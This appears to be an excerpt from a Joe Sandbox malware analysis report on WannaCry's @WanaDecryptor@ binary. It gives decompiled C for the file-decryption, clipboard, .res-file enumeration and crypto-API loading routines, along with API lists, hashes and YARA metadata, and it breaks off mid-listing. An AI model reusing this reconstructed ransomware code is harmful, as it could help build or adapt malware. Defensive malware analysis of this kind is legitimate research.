									goto L32;
								} else {
									_t223 = _v624;
									_t115 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x100,  &_v36, 0);
									__eflags = _t115;
									if(_t115 == 0) {
										goto L32;
									} else {
										_t116 = ReadFile(_t159,  &_v612, 4,  &_v36, 0);
										__eflags = _t116;
										if(_t116 == 0) {
											goto L32;
										} else {
											_t118 = ReadFile(_t159,  &_v572, 8,  &_v36, 0);
											__eflags = _t118;
											if(_t118 == 0) {
												goto L32;
											} else {
												__eflags = _v612 - 3;
												if(_v612 != 3) {
													_t119 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
													_t216 = _t119;
													_v608 = _t216;
													__eflags = _t216 - 0xffffffff;
													if(_t216 != 0xffffffff) {
														_push( &_v48);
														_push( &_v560);
														_t51 = _t223 + 4; // 0x4
														_t122 = E00404AF0(_t51,  *(_t223 + 0x4c8), _v616);
														__eflags = _t122;
														if(_t122 != 0) {
															L22:
															_t59 = _t223 + 0x54; // 0x54
															_push(0x10);
															_push(_v48);
															_t196 =  *0x4213b0; // 0x4218b0
															_push(_t196);
															_push( &_v560);
															E0040A150(_t59);
															_v44 = _v572;
															_v40 = _v568;
															while(1) {
																__eflags = _v40;
																if(__eflags < 0) {
																	break;
																}
																if(__eflags > 0) {
																	L26:
																	_t139 =  *(_t223 + 0x4d0);
																	__eflags = _t139;
																	if(_t139 == 0) {
																		L28:
																		_t140 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x100000,  &_v36, 0);
																		__eflags = _t140;
																		if(_t140 == 0) {
																			L34:
																			_push(0xffffffff);
																			_push( &_v20);
																			goto L33;
																		} else {
																			_t141 = _v36;
																			__eflags = _t141;
																			if(_t141 == 0) {
																				goto L34;
																			} else {
																				_v44 = _v44 - _t141;
																				asm("sbb dword [ebp-0x24], 0x0");
																				_t76 = _t223 + 0x54; // 0x54
																				E0040B3C0(_t159, _t76, _t226,  *(_t223 + 0x4c8),  *(_t223 + 0x4cc), _t141, 1);
																				_t145 = WriteFile(_t216,  *(_t223 + 0x4cc), _v36,  &_v32, 0);
																				__eflags = _t145;
																				if(_t145 == 0) {
																					goto L32;
																				} else {
																					__eflags = _v32 - _v36;
																					if(_v32 == _v36) {
																						continue;
																					} else {
																						goto L32;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags =  *_t139;
																		if( *_t139 != 0) {
																			goto L32;
																		} else {
																			goto L28;
																		}
																	}
																} else {
																	__eflags = _v44;
																	if(_v44 <= 0) {
																		break;
																	} else {
																		goto L26;
																	}
																}
																goto L41;
															}
															_push(0);
															SetFilePointerEx(_t216, _v572, _v568, 0);
															SetEndOfFile(_t216);
															goto L36;
														} else {
															_push( &_v48);
															_push( &_v560);
															_t56 = _t223 + 0x2c; // 0x2c
															_t148 = E00404AF0(_t56,  *(_t223 + 0x4c8), _v616);
															__eflags = _t148;
															if(_t148 != 0) {
																_v564 = 1;
																goto L22;
															} else {
																goto L20;
															}
														}
													} else {
														_push(_t119);
														_push( &_v20);
														goto L33;
													}
												} else {
													CloseHandle(_t159);
													_t159 = CreateFileW(_a4, 0xc0000000, 1, 0, 3, 0, 0);
													_v620 = _t159;
													__eflags = _t159 - 0xffffffff;
													if(_t159 == 0xffffffff) {
														goto L32;
													} else {
														SetFilePointer(_t159, 0xffff0000, 0, 2);
														_t152 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x10000,  &_v36, 0);
														__eflags = _t152;
														if(_t152 == 0) {
															goto L32;
														} else {
															__eflags = _v36 - 0x10000;
															if(_v36 != 0x10000) {
																goto L32;
															} else {
																SetFilePointer(_t159, 0, 0, 0);
																_t155 = WriteFile(_t159,  *(_t223 + 0x4c8), 0x10000,  &_v32, 0);
																__eflags = _t155;
																if(_t155 == 0) {
																	L20:
																	_push(0xffffffff);
																	_push( &_v20);
																	goto L33;
																} else {
																	__eflags = _v32 - 0x10000;
																	if(_v32 != 0x10000) {
																		goto L20;
																	} else {
																		SetFilePointer(_t159, 0xffff0000, 0, 2);
																		SetEndOfFile(_t159);
																		_t216 = _v608;
																		L36:
																		SetFileTime(_t216,  &_v604,  &_v596,  &_v588);
																		__eflags = _v612 - 3;
																		if(_v612 == 3) {
																			_t137 = CloseHandle(_t159) | 0xffffffff;
																			__eflags = _t137;
																			_v608 = _t137;
																			_v620 = _t137;
																			MoveFileW(_a4, _a8);
																		}
																		_t224 =  *(_t223 + 0x4d4);
																		__eflags = _t224;
																		if(_t224 != 0) {
																			 *_t224(_a4, _a8, _v568, _v572, 0, _v564);
																		}
																		_push(0xffffffff);
																		_push( &_v20);
																		L00413056();
																		 *[fs:0x0] = _v20;
																		return 1;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				} else {
					_push(_t213);
					_push( &_v20);
					L33:
					L00413056();
					 *[fs:0x0] = _v20;
					return 0;
				}
				L41:
			}




















































                                                      0x004020a3
                                                      0x004020a5
                                                      0x004020aa
                                                      0x004020b5
                                                      0x004020b6
                                                      0x004020c5
                                                      0x004020c6
                                                      0x004020cc
                                                      0x004020cf
                                                      0x004020d5
                                                      0x004020dd
                                                      0x004020e0
                                                      0x004020e6
                                                      0x004020ef
                                                      0x004020f5
                                                      0x004020fc
                                                      0x00402102
                                                      0x00402108
                                                      0x0040210b
                                                      0x0040210e
                                                      0x00402114
                                                      0x0040212d
                                                      0x0040212f
                                                      0x00402137
                                                      0x00402159
                                                      0x0040216e
                                                      0x00402174
                                                      0x00402176
                                                      0x0040244c
                                                      0x0040244c
                                                      0x00402451
                                                      0x00000000
                                                      0x0040217c
                                                      0x0040218c
                                                      0x0040218e
                                                      0x00402190
                                                      0x00000000
                                                      0x00402196
                                                      0x004021a5
                                                      0x004021ab
                                                      0x004021ad
                                                      0x00000000
                                                      0x004021b3
                                                      0x004021b3
                                                      0x004021bd
                                                      0x00000000
                                                      0x004021c3
                                                      0x004021ce
                                                      0x004021dc
                                                      0x004021e2
                                                      0x004021e4
                                                      0x00000000
                                                      0x004021ea
                                                      0x004021fa
                                                      0x00402200
                                                      0x00402202
                                                      0x00000000
                                                      0x00402208
                                                      0x00402218
                                                      0x0040221e
                                                      0x00402220
                                                      0x00000000
                                                      0x00402226
                                                      0x00402226
                                                      0x0040222d
                                                      0x0040230f
                                                      0x00402315
                                                      0x00402317
                                                      0x0040231d
                                                      0x00402320
                                                      0x0040232f
                                                      0x00402336
                                                      0x00402345
                                                      0x00402348
                                                      0x0040234d
                                                      0x0040234f
                                                      0x0040238b
                                                      0x0040238b
                                                      0x0040238e
                                                      0x00402393
                                                      0x00402394
                                                      0x0040239a
                                                      0x004023a1
                                                      0x004023a2
                                                      0x004023ad
                                                      0x004023b6
                                                      0x004023b9
                                                      0x004023bc
                                                      0x004023be
                                                      0x00000000
                                                      0x00000000
                                                      0x004023c4
                                                      0x004023d1
                                                      0x004023d1
                                                      0x004023d7
                                                      0x004023d9
                                                      0x004023e0
                                                      0x004023f3
                                                      0x004023f9
                                                      0x004023fb
                                                      0x0040246f
                                                      0x0040246f
                                                      0x00402474
                                                      0x00000000
                                                      0x004023fd
                                                      0x004023fd
                                                      0x00402400
                                                      0x00402402
                                                      0x00000000
                                                      0x00402404
                                                      0x00402404
                                                      0x00402407
                                                      0x0040241c
                                                      0x0040241f
                                                      0x00402436
                                                      0x0040243c
                                                      0x0040243e
                                                      0x00000000
                                                      0x00402440
                                                      0x00402443
                                                      0x00402446
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00402446
                                                      0x0040243e
                                                      0x00402402
                                                      0x004023db
                                                      0x004023db
                                                      0x004023de
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004023de
                                                      0x004023c6
                                                      0x004023c9
                                                      0x004023cb
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004023cb
                                                      0x00000000
                                                      0x004023c4
                                                      0x00402477
                                                      0x0040248a
                                                      0x00402491
                                                      0x00000000
                                                      0x00402351
                                                      0x00402354
                                                      0x0040235b
                                                      0x0040236a
                                                      0x0040236d
                                                      0x00402372
                                                      0x00402374
                                                      0x00402381
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00402374
                                                      0x00402322
                                                      0x00402322
                                                      0x00402326
                                                      0x00000000
                                                      0x00402326
                                                      0x00402233
                                                      0x00402234
                                                      0x00402253
                                                      0x00402255
                                                      0x0040225b
                                                      0x0040225e
                                                      0x00000000
                                                      0x00402264
                                                      0x00402274
                                                      0x00402289
                                                      0x0040228f
                                                      0x00402291
                                                      0x00000000
                                                      0x00402297
                                                      0x00402297
                                                      0x0040229e
                                                      0x00000000
                                                      0x004022a4
                                                      0x004022ab
                                                      0x004022c0
                                                      0x004022c6
                                                      0x004022c8
                                                      0x00402376
                                                      0x00402376
                                                      0x0040237b
                                                      0x00000000
                                                      0x004022ce
                                                      0x004022ce
                                                      0x004022d5
                                                      0x00000000
                                                      0x004022db
                                                      0x004022e5
                                                      0x004022e8
                                                      0x004022ee
                                                      0x00402497
                                                      0x004024ad
                                                      0x004024b3
                                                      0x004024ba
                                                      0x004024c3
                                                      0x004024c3
                                                      0x004024c6
                                                      0x004024cc
                                                      0x004024da
                                                      0x004024da
                                                      0x004024e0
                                                      0x004024e6
                                                      0x004024e8
                                                      0x00402509
                                                      0x00402509
                                                      0x0040250b
                                                      0x00402510
                                                      0x00402511
                                                      0x00402521
                                                      0x0040252e
                                                      0x0040252e
                                                      0x004022d5
                                                      0x004022c8
                                                      0x0040229e
                                                      0x00402291
                                                      0x0040225e
                                                      0x0040222d
                                                      0x00402220
                                                      0x00402202
                                                      0x004021e4
                                                      0x004021bd
                                                      0x004021ad
                                                      0x00402190
                                                      0x00402139
                                                      0x00402139
                                                      0x0040213d
                                                      0x00402452
                                                      0x00402452
                                                      0x0040245f
                                                      0x0040246c
                                                      0x0040246c
                                                      0x00000000

                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00402127
                                                      • GetFileTime.KERNEL32(00000000,?,?,?), ref: 00402159
                                                      • ReadFile.KERNEL32(00000000,00000000,00000008,?,00000000), ref: 0040216E
                                                      • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021A5
                                                      • ReadFile.KERNEL32(00000000,?,00000100,?,00000000), ref: 004021DC
                                                      • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021FA
                                                      • ReadFile.KERNEL32(00000000,?,00000008,?,00000000), ref: 00402218
                                                      • CloseHandle.KERNEL32(00000000), ref: 00402234
                                                      • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000000,00000000), ref: 0040224D
                                                      • SetFilePointer.KERNEL32(00000000,FFFF0000,00000000,00000002), ref: 00402274
                                                      • ReadFile.KERNEL32(00000000,?,00010000,?,00000000), ref: 00402289
                                                      • _local_unwind2.MSVCRT ref: 00402452
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Read$Create$CloseHandlePointerTime_local_unwind2
                                                      • String ID: WANACRY!
                                                      • API String ID: 1586634678-1240840912
                                                      • Opcode ID: 63e6b81c02b622754e2b3234a9462f2b9f42a26c1b415cc7ac48913855c751cb
                                                      • Instruction ID: 3da7a8628a1c4a9b72cf23ccbc301ae3d1bdd94b5a24a93ab77a4db798f2c342
                                                      • Opcode Fuzzy Hash: 63e6b81c02b622754e2b3234a9462f2b9f42a26c1b415cc7ac48913855c751cb
                                                      • Instruction Fuzzy Hash: 91D14471A00214AFDB20DB64CC89FEBB7B8FB88710F14466AF619B61D0D7B49945CF68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004035A0 Relevance: 36.2, APIs: 24, Instructions: 175windowclipboardmemoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 75%
                                                      			E004035A0(intOrPtr __ecx) {
				int _t51;
				void* _t54;
				long _t55;
				signed int _t64;
				signed int _t68;
				void* _t71;
				int _t78;
				short _t86;
				signed int _t92;
				intOrPtr _t110;
				int _t121;
				void* _t122;
				void* _t123;
				void* _t126;
				void* _t128;
				intOrPtr _t129;
				void* _t130;
				void* _t132;
				void* _t134;

				_push(0xffffffff);
				_push(E0041365C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t129;
				_t130 = _t129 - 0x2e4;
				_t110 = __ecx;
				 *((intOrPtr*)(_t130 + 0x28)) = __ecx;
				_t51 = SendMessageA( *(__ecx + 0x80), 0x1004, 0, 0);
				if(_t51 != 0) {
					_t51 = OpenClipboard( *(_t110 + 0x20));
					if(_t51 != 0) {
						_t121 = 0;
						_t126 = 0;
						if(SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0) > 0) {
							do {
								_push(0);
								_t71 = _t130 + 0x18;
								_push(_t121);
								_push(_t71);
								L00412D7C();
								_push(0x4206e0);
								_push(_t71);
								_push(_t130 + 0x14);
								 *(_t130 + 0x308) = 0;
								L00412CCE();
								 *(_t130 + 0x2fc) = 2;
								L00412CC2();
								 *(_t130 + 0x2fc) = 0xffffffff;
								_t126 = _t126 +  *( *(_t130 + 0x10) - 8) * 2;
								L00412CC2();
								_t121 = _t121 + 1;
							} while (_t121 < SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0));
						}
						_t122 = GlobalAlloc(2, _t126 + 2);
						 *(_t130 + 0x14) = _t122;
						if(_t122 != 0) {
							_t54 = GlobalLock(_t122);
							 *(_t130 + 0x10) = _t54;
							if(_t54 != 0) {
								_t78 = 0;
								_t128 = 0;
								_t55 = SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0);
								if(_t55 > 0) {
									while(1) {
										_push(0);
										_push(_t78);
										_push(_t130 + 0x24);
										L00412D7C();
										_push(0x4206e0);
										_push(_t55);
										 *((intOrPtr*)(_t130 + 0x304)) = 3;
										_push(_t130 + 0x24);
										L00412CCE();
										 *(_t130 + 0x2fc) = 5;
										L00412CC2();
										_t86 =  *0x42179c; // 0x0
										 *(_t130 + 0x24) = _t86;
										memset(_t130 + 0x26, 0, 0xb3 << 2);
										_t132 = _t130 + 0xc;
										asm("stosw");
										MultiByteToWideChar(0, 0,  *(_t132 + 0x1c), 0xffffffff, _t130 + 0x24, 0x167);
										_t64 = wcslen(_t132 + 0x24);
										_t123 = _t132 + 0x28;
										_t92 = _t64 << 1 >> 2;
										memcpy(_t123 + _t92 + _t92, _t123, memcpy( *((intOrPtr*)(_t132 + 0x14)) + _t128, _t123, _t92 << 2) & 0x00000003);
										_t134 = _t132 + 0x18;
										_t68 = wcslen(_t134 + 0x28);
										_t130 = _t134 + 8;
										_t128 = _t128 + _t68 * 2;
										 *(_t130 + 0x2fc) = 0xffffffff;
										L00412CC2();
										_t78 = _t78 + 1;
										_t55 = SendMessageA( *( *((intOrPtr*)(_t130 + 0x18)) + 0x80), 0x1004, 0, 0);
										if(_t78 >= _t55) {
											break;
										}
										_t110 =  *((intOrPtr*)(_t130 + 0x18));
									}
									_t122 =  *(_t130 + 0x14);
								}
								 *((short*)( *(_t130 + 0x10) + _t128)) = 0;
								GlobalUnlock(_t122);
								EmptyClipboard();
								SetClipboardData(0xd, _t122);
							} else {
								GlobalFree(_t122);
							}
						}
						_t51 = CloseClipboard();
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t130 + 0x2f4));
				return _t51;
			}






















                                                      0x004035a0
                                                      0x004035a2
                                                      0x004035ad
                                                      0x004035ae
                                                      0x004035b5
                                                      0x004035c5
                                                      0x004035d7
                                                      0x004035db
                                                      0x004035df
                                                      0x004035e9
                                                      0x004035f1
                                                      0x004035fd
                                                      0x00403607
                                                      0x0040360d
                                                      0x0040360f
                                                      0x0040360f
                                                      0x00403611
                                                      0x00403615
                                                      0x00403616
                                                      0x0040361a
                                                      0x0040361f
                                                      0x00403628
                                                      0x00403629
                                                      0x0040362a
                                                      0x00403635
                                                      0x0040363e
                                                      0x00403646
                                                      0x00403653
                                                      0x00403661
                                                      0x00403665
                                                      0x0040367a
                                                      0x0040367d
                                                      0x0040360f
                                                      0x0040368d
                                                      0x00403691
                                                      0x00403695
                                                      0x0040369c
                                                      0x004036a4
                                                      0x004036a8
                                                      0x004036bc
                                                      0x004036c6
                                                      0x004036c8
                                                      0x004036d0
                                                      0x004036dc
                                                      0x004036dc
                                                      0x004036e2
                                                      0x004036e3
                                                      0x004036e7
                                                      0x004036ec
                                                      0x004036f1
                                                      0x004036f6
                                                      0x00403701
                                                      0x00403702
                                                      0x0040370b
                                                      0x00403713
                                                      0x00403718
                                                      0x00403721
                                                      0x00403733
                                                      0x00403733
                                                      0x00403735
                                                      0x00403748
                                                      0x00403753
                                                      0x00403763
                                                      0x0040376a
                                                      0x00403774
                                                      0x00403774
                                                      0x0040377b
                                                      0x00403781
                                                      0x00403788
                                                      0x0040378c
                                                      0x00403797
                                                      0x004037af
                                                      0x004037b1
                                                      0x004037b9
                                                      0x00000000
                                                      0x00000000
                                                      0x004036d8
                                                      0x004036d8
                                                      0x004037bf
                                                      0x004037bf
                                                      0x004037c8
                                                      0x004037ce
                                                      0x004037d4
                                                      0x004037dd
                                                      0x004036aa
                                                      0x004036ab
                                                      0x004036ab
                                                      0x004036a8
                                                      0x004037e3
                                                      0x004037e3
                                                      0x004035f1
                                                      0x004037f4
                                                      0x00403801

                                                      APIs
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004035DB
                                                      • OpenClipboard.USER32(?), ref: 004035E9
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00403609
                                                      • #3301.MFC42(?,00000000,00000000), ref: 0040361A
                                                      • #924.MFC42 ref: 00403635
                                                      • #800.MFC42 ref: 00403646
                                                      • #800.MFC42 ref: 00403665
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040367B
                                                      • GlobalAlloc.KERNEL32(00000002,-00000002), ref: 00403687
                                                      • GlobalLock.KERNEL32(00000000), ref: 0040369C
                                                      • GlobalFree.KERNEL32(00000000), ref: 004036AB
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004036C8
                                                      • #3301.MFC42(?,00000000,00000000), ref: 004036E7
                                                      • #924.MFC42(00000000), ref: 00403702
                                                      • #800.MFC42(00000000), ref: 00403713
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000167,00000000), ref: 00403748
                                                      • wcslen.MSVCRT ref: 00403753
                                                      • wcslen.MSVCRT ref: 0040377B
                                                      • #800.MFC42 ref: 00403797
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004037B1
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004037CE
                                                      • EmptyClipboard.USER32 ref: 004037D4
                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004037DD
                                                      • CloseClipboard.USER32 ref: 004037E3
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#800ClipboardGlobal$#3301#924wcslen$AllocByteCharCloseDataEmptyFreeLockMultiOpenUnlockWide
                                                      • String ID:
                                                      • API String ID: 3405503685-0
                                                      • Opcode ID: 8830a6fbde82a0506a617069f42227a829ac694ec6c697a23238cf2d660267b9
                                                      • Instruction ID: c86228cefcec1f34603e32cf9825c4429cf2ad1f23db843e272d7cdac5f24a66
                                                      • Opcode Fuzzy Hash: 8830a6fbde82a0506a617069f42227a829ac694ec6c697a23238cf2d660267b9
                                                      • Instruction Fuzzy Hash: 0151E571204706ABD320DF64DC45FEBB7A8FB88754F10462DF249A72D0DB749909CBAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00403CB0 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 122filewindowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 69%
                                                      			E00403CB0(struct _WIN32_FIND_DATAA* __ecx) {
				void* _t31;
				int _t34;
				int _t37;
				intOrPtr _t39;
				int _t42;
				struct _WIN32_FIND_DATAA* _t54;
				void* _t75;
				struct _IO_FILE* _t76;
				struct _WIN32_FIND_DATAA* _t79;
				void* _t81;
				void* _t82;
				void* _t83;
				void* _t84;

				_t54 = __ecx;
				_t79 = __ecx;
				 *((intOrPtr*)(_t81 + 0xc)) = __ecx;
				_t31 = FindFirstFileA("*.res", _t81 + 0xcc);
				 *(_t81 + 8) = _t31;
				if(_t31 != 0xffffffff) {
					goto L3;
					L14:
					_t75 =  *(_t81 + 0x14);
					_t54 = _t81 + 0xdc;
					if(FindNextFileA(_t75, _t54) != 0) {
						L3:
						if(( *(_t81 + 0xdc) & 0x00000010) == 0) {
							asm("repne scasb");
							if( !(_t54 | 0xffffffff) - 1 == 0xc) {
								_t34 = sscanf(_t81 + 0x108, "%08X.res", _t81 + 0x1c);
								_t81 = _t81 + 0xc;
								if(_t34 >= 1) {
									_t76 = fopen(_t81 + 0x108, "rb");
									_t81 = _t81 + 8;
									 *(_t81 + 0x18) = _t76;
									if(_t76 != 0) {
										_t37 = fread(_t81 + 0x5c, 0x88, 1, _t76);
										_t82 = _t81 + 0x10;
										if(_t37 == 1) {
											_t39 =  *((intOrPtr*)(_t82 + 0x1c));
											_t60 =  *((intOrPtr*)(_t82 + 0x5c));
											if( *((intOrPtr*)(_t82 + 0x5c)) == _t39) {
												if(_t39 != 0) {
													 *((char*)(_t82 + 0x21)) = 0x5c;
													 *((char*)(_t82 + 0x28)) = 0x5c;
													E00401C30(_t60, _t39, _t82 + 0x22);
													_t83 = _t82 + 8;
													_push(_t83 + 0x20);
													_push(0);
													_push(0x143);
												} else {
													sprintf(_t82 + 0x20, "My Computer");
													_t83 = _t82 + 8;
													_push(_t83 + 0x20);
													_push(0);
													_push(0x14a);
												}
												_t42 = SendMessageA( *(_t79 + 0xc0), ??, ??, ??);
												_push(0x88);
												L00412CEC();
												_t84 = _t83 + 4;
												memcpy(_t42, _t84 + 0x54, 0x22 << 2);
												_t82 = _t84 + 0xc;
												SendMessageA( *( *((intOrPtr*)(_t83 + 0x14)) + 0xc0), 0x151, _t42, _t42);
												_t76 =  *(_t82 + 0x18);
												_t79 =  *((intOrPtr*)(_t82 + 0x10));
											}
										}
										fclose(_t76);
										_t81 = _t82 + 4;
									}
								}
							}
						}
						goto L14;
					} else {
						FindClose(_t75);
						return 1;
					}
				} else {
					return 0;
				}
			}
















                                                      0x00403cb0
                                                      0x00403cbe
                                                      0x00403cc6
                                                      0x00403cca
                                                      0x00403cd3
                                                      0x00403cd7
                                                      0x00403ceb
                                                      0x00403e1f
                                                      0x00403e1f
                                                      0x00403e23
                                                      0x00403e34
                                                      0x00403cec
                                                      0x00403cf4
                                                      0x00403d06
                                                      0x00403d0e
                                                      0x00403d26
                                                      0x00403d2c
                                                      0x00403d32
                                                      0x00403d4b
                                                      0x00403d4d
                                                      0x00403d52
                                                      0x00403d56
                                                      0x00403d69
                                                      0x00403d6f
                                                      0x00403d75
                                                      0x00403d7b
                                                      0x00403d7f
                                                      0x00403d85
                                                      0x00403d8d
                                                      0x00403db4
                                                      0x00403dbb
                                                      0x00403dc0
                                                      0x00403dc5
                                                      0x00403dcc
                                                      0x00403dcd
                                                      0x00403dcf
                                                      0x00403d8f
                                                      0x00403d99
                                                      0x00403d9f
                                                      0x00403da6
                                                      0x00403da7
                                                      0x00403da9
                                                      0x00403da9
                                                      0x00403ddb
                                                      0x00403ddd
                                                      0x00403de4
                                                      0x00403ded
                                                      0x00403dfc
                                                      0x00403dfc
                                                      0x00403e0b
                                                      0x00403e0d
                                                      0x00403e11
                                                      0x00403e11
                                                      0x00403d85
                                                      0x00403e16
                                                      0x00403e1c
                                                      0x00403e1c
                                                      0x00403d56
                                                      0x00403d32
                                                      0x00403d0e
                                                      0x00000000
                                                      0x00403e3a
                                                      0x00403e3b
                                                      0x00403e50
                                                      0x00403e50
                                                      0x00403cd9
                                                      0x00403ce2
                                                      0x00403ce2

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$FileMessageSend$#823CloseFirstNextfclosefopenfreadsprintfsscanf
                                                      • String ID: %08X.res$*.res$My Computer$\$\
                                                      • API String ID: 1476605332-298172004
                                                      • Opcode ID: 97a695bc1a9f425159621aa26688142562d89307bea82b304c77383c11b419a6
                                                      • Instruction ID: 8c176cb2dc152f679f03352499a178afa0a04d74b0fbd326e0cc20a81f44b8b1
                                                      • Opcode Fuzzy Hash: 97a695bc1a9f425159621aa26688142562d89307bea82b304c77383c11b419a6
                                                      • Instruction Fuzzy Hash: F741C671508300ABE710CB54DC45FEB7799EFC4715F404A2DF984A62C1E7B8EA498B9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404B70 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 62libraryloaderCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00404B70() {
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t20;

				if( *0x4217c0 == 0) {
					_t20 = LoadLibraryA("advapi32.dll");
					if(_t20 == 0) {
						L10:
						return 0;
					} else {
						 *0x4217c0 = GetProcAddress(_t20, "CryptAcquireContextA");
						 *0x4217c4 = GetProcAddress(_t20, "CryptImportKey");
						 *0x4217c8 = GetProcAddress(_t20, "CryptDestroyKey");
						 *0x4217cc = GetProcAddress(_t20, "CryptEncrypt");
						 *0x4217d0 = GetProcAddress(_t20, "CryptDecrypt");
						_t9 = GetProcAddress(_t20, "CryptGenKey");
						 *0x4217d4 = _t9;
						if( *0x4217c0 == 0 ||  *0x4217c4 == 0 ||  *0x4217c8 == 0 ||  *0x4217cc == 0 ||  *0x4217d0 == 0 || _t9 == 0) {
							goto L10;
						} else {
							return 1;
						}
					}
				} else {
					return 1;
				}
			}





                                                      0x00404b78
                                                      0x00404b8c
                                                      0x00404b90
                                                      0x00404c29
                                                      0x00404c2c
                                                      0x00404b96
                                                      0x00404bab
                                                      0x00404bb8
                                                      0x00404bc5
                                                      0x00404bd2
                                                      0x00404bdf
                                                      0x00404be4
                                                      0x00404bec
                                                      0x00404bf4
                                                      0x00000000
                                                      0x00404c22
                                                      0x00404c28
                                                      0x00404c28
                                                      0x00404bf4
                                                      0x00404b7a
                                                      0x00404b80
                                                      0x00404b80

                                                      APIs
                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00402C46), ref: 00404B86
                                                      • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00404BA3
                                                      • GetProcAddress.KERNEL32(00000000,CryptImportKey), ref: 00404BB0
                                                      • GetProcAddress.KERNEL32(00000000,CryptDestroyKey), ref: 00404BBD
                                                      • GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 00404BCA
                                                      • GetProcAddress.KERNEL32(00000000,CryptDecrypt), ref: 00404BD7
                                                      • GetProcAddress.KERNEL32(00000000,CryptGenKey), ref: 00404BE4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
